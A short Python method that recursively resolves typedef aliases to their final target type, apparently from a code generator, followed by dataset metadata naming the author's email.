def resolve_all_typedef(self, t: str):
c = self.__getitem__(t)
if isinstance(c, GeneratorTypedef) and t != c.target:
return self.resolve_all_typedef(c.target)
return c
| [
"nanoric@qq.com"
] | nanoric@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.